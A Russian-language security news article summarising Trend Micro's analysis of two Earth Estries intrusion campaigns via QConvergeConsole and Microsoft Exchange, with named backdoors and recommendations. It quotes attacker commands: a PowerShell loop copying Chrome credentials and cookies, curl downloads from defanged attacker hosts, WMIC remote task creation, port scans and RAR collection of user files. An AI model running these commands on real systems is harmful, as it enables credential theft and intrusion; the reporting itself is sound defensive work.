Earth Estries: Trend Micro раскрывает виртуозные уловки хакеров-невидимок

Trend Micro подробно рассказала о двух масштабных хакерских кампаниях, запущенных группировкой Earth Estries. Злоумышленники применили продвинутые техники проникновения в корпоративные системы через уязвимости в широко распространенном программном обеспечении.

Первая схема атаки сфокусировалась на эксплуатации QConvergeConsole - инструмента для управления оптоволоконными адаптерами QLogic. После получения начального доступа хакеры использовали утилиты PsExec и WMIC для распространения вредоноса по сети.

Исследователи отмечают, что злоумышленники эксплуатировали уязвимости или некорректные настройки QConvergeConsole через установленный агент удаленного приложения (c:program filesqlogic corporation qagent etqlremote.exe), который позволял проводить сетевое сканирование и устанавливать Cobalt Strike на целевые машины.

В другом случае группировка использовала уязвимость в Apache Tomcat6, поставляемом с QConvergeConsole (c:program files (x86)qlogic corporationqconvergeconsole omcat-x64apache-tomcat-6.0.35in omcat6.exe), для бокового перемещения и управления инструментами поздних стадий атаки.

Группировка также активно применяла различные бэкдоры для закрепления в системе. Среди них - Cobalt Strike, Trillclient, Hemigate и новый образец под названием Crowdoor. Вредоносное ПО доставлялось на зараженные машины в виде CAB-архивов.

Особое внимание привлекает инструмент Trillclient, который похищал учетные данные из кэша браузеров. С его помощью злоумышленники получали дополнительный контроль над скомпрометированными системами. Earth Estries демонстрировали глубокое понимание инфраструктуры жертв - они напрямую скачивали документы из внутренних веб-хранилищ с помощью команды wget.

Trillclient запускал PowerShell-скрипт для сбора профилей пользователей:

foreach($win_user_path in $users_path){

echo D | xcopy "C:Users$win_user_pathAppDataRoamingMicrosoftProtect" "$copy_dest_path$win_user_pathProtect" /E /C /H;

attrib -a -s -r -h "$copy_dest_path$win_user_path*" /S /D;

echo F | xcopy "C:Users$win_user_pathAppDataLocalGoogleChromeUser DataLocal State" "$copy_dest_path$win_user_pathLocal State" /C;

echo F | xcopy "C:Users$win_user_pathAppDataLocalGoogleChromeUser DataDefaultNetworkCookies" "$copy_dest_path$win_user_pathDefaultNetworkCookies" /C

echo F | xcopy "C:Users$win_user_pathAppDataLocalGoogleChromeUser DataDefaultLogin Data" "$copy_dest_path$win_user_pathDefaultLogin Data" /C;

}

Во второй схеме атаки хакеры эксплуатировали уязвимости в Microsoft Exchange. На серверы устанавливался веб-шелл ChinaCopper, через который злоумышленники разворачивали Cobalt Strike и другие инструменты для бокового перемещения по сети.

Ключевыми компонентами этой цепочки стали бэкдоры Zingdoor и SnappyBee (известный также как Deed RAT). Вредоносное ПО загружалось либо с управляющих серверов, либо через curl-запросы к подконтрольным хакерам сайтам. Типичные команды для загрузки инструментов выглядели так:

curl -o c:windowsimeimejpVXTR hxxp://96[.]44[.]160[.]181/VXTR.txt

curl -k -o C:programdataUNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx

curl -k -o C:programdataportscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docx

В отличие от первой схемы, здесь основной акцент делался на эксплуатации Exchange и частом обновлении вредоносных программ для избежания обнаружения. Группировка активно использовала PortScan для картографирования сетей, а дополнительные бэкдоры помогали в сборе и экспорте документов через RAR-архивы.

Earth Estries уделяли особое внимание скрытному присутствию в сетях жертв. Они регулярно обновляли свои инструменты и заметали следы, удаляя старые версии вредоносного ПО. Длительное присутствие обеспечивалось различными кастомными бэкдорами, включая недавно обнаруженный Crowdoor, который взаимодействовал с Cobalt Strike.

Для закрепления в системе злоумышленники использовали различные методы создания задач по расписанию, в том числе удаленное создание через WMIC:

wmic /node:<IP> /user:<domain><user> /password:***** process call create "schtasks /run /tn microsoftsihost"

Исследователи выявили несколько техник, применяемых группировкой. Помимо кражи учетных данных через Trillclient, хакеры маскировали командный трафик через локальные и удаленные прокси-серверы.

Для разведки сетевой инфраструктуры использовались PortScan и специальные скрипты. После скачивания утилиты PortScan злоумышленники проводили сканирование сети на наличие открытых портов 80, 443, 445 и 3389:

cmd.exe /c "C:programdataportscan.exe 172.xx.xx.0/24 445,3389,80,443"

cmd.exe /c "C:programdataportscan.exe 172.xx.xx.0/24 445,3389,80,443 >1.log"

Собранные данные упаковывались в зашифрованные RAR-архивы и выгружались через анонимные файлообменники. Примеры команд для сбора данных:

rar.exe a -m5 <install path>his231.rar "C:Users<username>AppDataLocalGoogleChromeUser DataDefaultHistory"

rar.exe a <install path>311.rar C:users<user name>Desktop* C:users<user name>Downloads* C:users<user name>Documents* -r -y -ta<cutoff date>

В ходе исследования были обнаружены дополнительные бэкдоры - FuxosDoor и Cryptmerlin. FuxosDoor работал как бэкдор для веб-сервера IIS, обеспечивая скрытую связь с командными серверами. Cryptmerlin использовал технику DLL sideloading для длительного контроля над зараженными машинами.

Zingdoor и SnappyBee функционировали как HTTP-бэкдоры, облегчая боковое перемещение по сети. SnappyBee представляет собой модульный бэкдор, считающийся преемником ShadowPad. Оба вредоноса использовали механизм DLL sideloading для внедрения в легитимные процессы.

Через веб-шелл ChinaChopper злоумышленники создавали удаленные службы для повышения привилегий и обеспечения персистентности:

sc \{hostname} create VGAuthtools type= own start= auto binpath= "c:windowsmicrosoft.netFrameworkv4.0.30319Installutil.exe C:ProgramdataVMwarevmvssrv.exe"

Новый бэкдор Crowdoor, замеченный в первой цепочке атак, расширял возможности группировки по переустановке и обновлению Cobalt Strike на скомпрометированных системах. Он выполнял различные действия в зависимости от переданных аргументов, включая установку механизмов персистентности через реестр или службы.

Веб-шелл ChinaCopper, использованный во второй схеме, предоставлял удаленный контроль над зараженными серверами Exchange и служил плацдармом для дальнейшего проникновения в сеть.

Специалисты настоятельно рекомендуют организациям устранять уязвимости в сервисах, доступных извне, особенно в широко используемых приложениях вроде почтовых серверов и консолей управления.